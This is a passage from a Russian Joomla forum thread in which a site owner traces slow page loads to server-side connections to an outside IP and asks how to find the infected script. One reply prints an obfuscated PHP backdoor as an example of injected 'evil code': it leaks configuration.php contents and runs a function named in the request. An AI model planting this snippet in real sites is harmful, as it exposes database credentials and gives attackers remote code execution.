Форум русской поддержки Joomla!® CMS
10.12.2016, 12:50:06 *
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь.
Вам не пришло письмо с кодом активации?

Войти
   
   Начало   Поиск Joomla 3.0 FAQ Joomla 2.5 FAQ Joomla 1.5 FAQ Правила форума Новости Joomla Реклама Войти Регистрация Помощь  
Страниц: [1] 2  Все   Вниз
  Добавить закладку  |  Печать  
Автор

Медленная загрузка страниц сайта

 (Прочитано 376 раз)
0 Пользователей и 1 Гость смотрят эту тему.
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« : 24.05.2016, 13:00:13 »

Добрый день!
У меня возникла интересная проблема, со вчерашнего дня сайты на Joomla стали медленно грузится. Например этот: www.gid.land. Страницы грузятся по 10 секунд.
Я написал  хостеру в техподдержку, и получил ответ, что
Продиагностировали дочерние процессы веб-сервера Apache при работе Ваших сайтов с помощью утилиты strace, проверка показала, что больше всего времени тратится при попытке подключения к серверу 51.255.192.203 на порт 80:
20:23:10.556362 connect(3, {sa_family=AF_INET, sin_port=htons(80), sin_addr=inet_addr("51.255.192.203")}, 16) = -1  EINPROGRESS (Operation now in progress)
20:23:10.556491 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:10.556530 poll([{fd=3, events=POLLOUT}], 1, 1) = 0 (Timeout)
20:23:10.557742 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:10.557844 poll([{fd=3, events=POLLOUT}], 1, 198) = 0 (Timeout)
20:23:10.756119 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:10.756269 poll([{fd=3, events=POLLOUT}], 1, 0) = 0 (Timeout)
20:23:10.756345 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:10.756411 poll([{fd=3, events=POLLOUT}], 1, 1000) = 0 (Timeout)
20:23:11.757332 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:11.757475 poll([{fd=3, events=POLLOUT}], 1, 1000) = 0 (Timeout)
20:23:12.758680 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:12.758768 poll([{fd=3, events=POLLOUT}], 1, 1000) = 0 (Timeout)
20:23:13.759338 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:13.759427 poll([{fd=3, events=POLLOUT}], 1, 1000) = 0 (Timeout)
20:23:14.760445 poll([{fd=3, events=POLLOUT|POLLWRNORM}], 1, 0) = 0 (Timeout)
20:23:14.760575 poll([{fd=3, events=POLLOUT}], 1, 796) = 0 (Timeout)
20:23:15.556823 close(3)                = 0

Т.к. этот сервер недоступен то сайт ожидает подключения в течение 5 секунд, эти 5 секунд идут в скорость загрузки сайтов.
------------------

Сделал восстановление сайта на неделю назад, когда проблема не обнаруживалась - результата не дало.

Подскажите, что может быть?
Как найти  - что стучится на удаленный IP?

Спасибо всем заранее
Записан
Arkadiy
Группа развития
*****

Репутация: +432/-0
Offline Offline

Пол: Мужской
Сообщений: 5317


Крепитесь, други.


« Ответ #1 : 24.05.2016, 19:08:47 »

У вас установлено расширение, которое берет данные с сайта 51.255.192.203, найдите его и отключите.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #2 : 24.05.2016, 19:14:51 »

Да, я понимаю, я перенес сайт на другой сервер, снес все модули, плагины и компоненты, - сторонние, проблема остается..
gid.ctour.co.il это голая версия..
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #3 : 24.05.2016, 20:19:16 »

Скачал весь сайт, прогнал в редакторе поиск адреса  51.255.192.203 - ничего не находит..
У кого-то есть идеи?
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #4 : 24.05.2016, 20:30:43 »

А что за poll?
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #5 : 24.05.2016, 20:35:46 »

Не могу сказать, это лог из саппорта.
Голосований на сайте не стоит..
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #6 : 24.05.2016, 20:37:44 »

Проверил сайт на вирусы - все чисто..
Записан
voland
Профи
********

Репутация: +488/-86
Offline Offline

Пол: Мужской
Сообщений: 8736


любит наш народ всякое гавно...


« Ответ #7 : 24.05.2016, 20:52:07 »

Проверил сайт на вирусы - все чисто..
А если найду?
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #8 : 24.05.2016, 20:53:34 »

был бы рад:)
Искал в скачанных файлах сайта Айболитом, Доктор Веб и Манул от Яндекса.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #9 : 24.05.2016, 20:55:51 »

Что интересно, указанная проблема наблюдается на почти всех Joomla сайтах, расположенных на хосте.
Я также использую AdminTools  - купленную от Akeeba.
Возможно, стоит просканировать базу данных?
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #10 : 24.05.2016, 21:04:01 »

Мне кажется к joomle ни какого отношение не имеет.

http://pubs.opengroup.org/onlinepubs/009695399/functions/poll.html

Если, вы из панели управления хостом не запускаете ни чего, тоды вам видимо к хостеру.
Я могу быть не прав
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #11 : 24.05.2016, 21:08:52 »

Я перенес сайт на другой сервер - та же байда..
 
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #12 : 24.05.2016, 21:09:30 »

Скачал  базу данных  только что, просканировал на предмет этого IP адреса 51.255.192.203  - не находит ничего.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #13 : 24.05.2016, 21:10:27 »

как то можно выявить, какой скрипт стучится на удаленный IP?
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #14 : 24.05.2016, 21:16:01 »

Посмотрите кода меняли последний раз файлы php, и ковыряйтесь в них вставки там base64, zip может что вставил вирусняк а айболит еще не в курсе.
а Joomla то какая? последняя хоть?
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #15 : 24.05.2016, 21:16:34 »

Joomla вся последняя.
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #16 : 24.05.2016, 21:41:13 »

А кроном вы ни чего не запускаете?
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #17 : 24.05.2016, 21:51:54 »

Я лично нет..
Важный вопрос..
Если залить свежую версию Joomla поверх существующих файлов, это повредит существующий сайт?
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #18 : 24.05.2016, 22:05:41 »

Если залить свежую Joomla поверх, может что-то улететь, а может и нет.
Сделайте бэкап сайта и базы и в путь.

Записан
wishlight
Профи
********

Репутация: +201/-1
Offline Offline

Пол: Мужской
Сообщений: 3491


skype aqaus.com


« Ответ #19 : 24.05.2016, 22:30:06 »

Если файлы ядра не менялись, то можно лить. Бекап только.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #20 : 24.05.2016, 22:31:27 »

Завтра буду пробовать.
В принципе бекапы есть на все сайты, кроме одного.
А еще вопрос: если установить чистую версию Joomla, установить все компоненты, модули, шаблоны как на старом сайте, а затем законектить к ней старую базу даных, это будет работать?
Спс
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #21 : 24.05.2016, 22:32:45 »

А какие файлы вы понимаете под ядром?
Сорри за не понимание;(
Что там могло меняться?
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #22 : 24.05.2016, 22:33:31 »

Завтра собираюсь перезалить после бекапа папку за папкой.
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #23 : 24.05.2016, 22:34:03 »

Цитировать
Важный вопрос..
В принципе нет.

Кто-то или что-то пытается создать соединения при обращении к сайту.
т.к выполняется на стороне сервера то это или php скрипт или скрипт выполняемый самим сервером.
если вы перенесли все на новый сервер, то по идеи остается только скрипты php.
Ну а тут яб поискал запускается он до выполнения index.php шаблона или после и копал бы в сторону...
Посмотрите визуально на файлы php хоть шаблона, визуально нет ли там какого странного кода.

Вот строчки такого плана
require_once(dirname(__FILE__). '/php/virus.php');

gz, base64, zip ,compress (что-то такого плана) = тут белиберда всякая в скобочках,
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #24 : 24.05.2016, 22:40:31 »

Я шаблон переустановил заново. Устанавливал другой шаблон и все то же, грузится медленно.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #25 : 24.05.2016, 22:42:53 »

"Вот строчки такого плана
require_once(dirname(__FILE__). '/php/virus.
gz, base64, zip ,compress ,"
[/i]


Эти строчки нужно искать?
Поиском реально их найти?
Использую Notepad++
« Последнее редактирование: 24.05.2016, 22:51:40 от designer71 » Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #26 : 24.05.2016, 22:54:43 »

Вы скорей всего не справитесь, извините...

Вот вам пример злого кода.

vzuvezv<?php $c=base64_encode(file_get_contents('configuration.php'));echo $c;$_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>

Сделайте бэкап, поставте чистую Joomla и новую базу и смотрите. Тормозит не тормозит.
Ежли тормозит то к хостеру.

Пошагово менять папки трудно, пока меняешь, если кто-то заходит на сайт, вирус размножается по файлам (если это вирус)

Цитировать
А какие файлы вы понимаете под ядром?
Это все файлы исключая папку templates
Если руками в файлах ядра ни че не меняли, можете Joomla ставить поверх, но сделайте бэкап.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #27 : 24.05.2016, 23:06:13 »

Большое спасибо за подробный ответ!
Завтра буду пробовать.
Отпишусь.
Свежа Joomla стоит работает нормально.
Буду менять папку за папкой на тестовом сервере, куда никто не заходит.
Записан
designer71
Осваиваюсь на форуме
***

Репутация: +0/-0
Offline Offline

Сообщений: 108


« Ответ #28 : 24.05.2016, 23:06:57 »

Ставить поверх - можно просто перезалить папки?
Записан
pavelrer
Давно я тут
****

Репутация: +4/-0
Offline Offline

Сообщений: 262


« Ответ #29 : 24.05.2016, 23:19:14 »

можно и перезалить.
конфиг только старый верните и папку установки удалите.
Да и поменяйте логин, пароль, префикс к БД. может к вам и с наружи кто в гости ходит.
если сайт оживет, то все хорошо, если со временем помрет то заражен шаблон, нужно чистить шаблон.
но самое поганое если почистите все файлы а оно опять вылезти, вероятно в БД сидит.
Записан
Страниц: [1] 2  Все   Вверх
  Добавить закладку  |  Печать  
 
Перейти в:  

Powered by SMF 1.1.21 | SMF © 2006, Simple Machines

Joomlaforum.ru is not affiliated with or endorsed by the Joomla! Project or Open Source Matters.
The Joomla! name and logo is used under a limited license granted by Open Source Matters
the trademark holder in the United States and other countries.

LiveInternet